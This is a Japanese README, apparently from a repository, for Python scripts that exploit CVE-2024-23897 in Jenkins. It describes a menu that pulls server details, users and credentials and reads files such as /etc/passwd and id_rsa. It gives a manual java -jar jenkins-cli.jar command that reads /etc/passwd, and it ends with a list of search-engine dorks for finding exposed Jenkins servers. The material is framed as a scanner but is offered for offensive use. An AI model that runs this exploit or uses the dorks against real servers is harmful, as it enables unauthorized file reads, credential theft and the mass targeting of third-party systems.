
Pythonで作成された、CVE-2024-23897の脆弱性を自動化するスクリプト
影響を受けるバージョン:
CVE-2024-23897 の脆弱性を自動化するために Python で作成されたスクリプト 🤖 🛠️
この Python コードは、Jenkins サーバーにおける特定の脆弱性 (CVE-2024-23897) のスキャナーを提供します。 まず、ユーザーに Jenkins サーバーの URL を要求します。
次に、コマンドラインから Jenkins と対話するために必要な「jenkins-cli.jar」ファイルをダウンロードするオプションを提供します。その後、サーバー情報、環境情報、Jenkins 設定、ユーザー、認証情報の取得などのコマンドを実行するオプションのメニューと、「/etc/passwd」「/etc/os-release」「id_rsa」などの機密ファイルの読み取りを実行するオプションを表示します。
メニューのオプションを選択すると、指定された Jenkins サーバー上で対応するコマンドが実行されます。 コードは、ファイルをダウンロードしてコマンドを実行する関数と、プログラムのフローを処理するメイン関数で構成されています。
Jenkins サーバーでの実行 📝:
python3 CVE-2024-23897-A-scaner.py
DOCKER 上の Jenkins サーバーでの実行 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
手動実行。
1- jenkins-cli.jar をダウンロード : http:///jnlpJars/jenkins-cli.jar
2- LFI を実行するには、次のコマンドを実行します: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
dork リスト:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"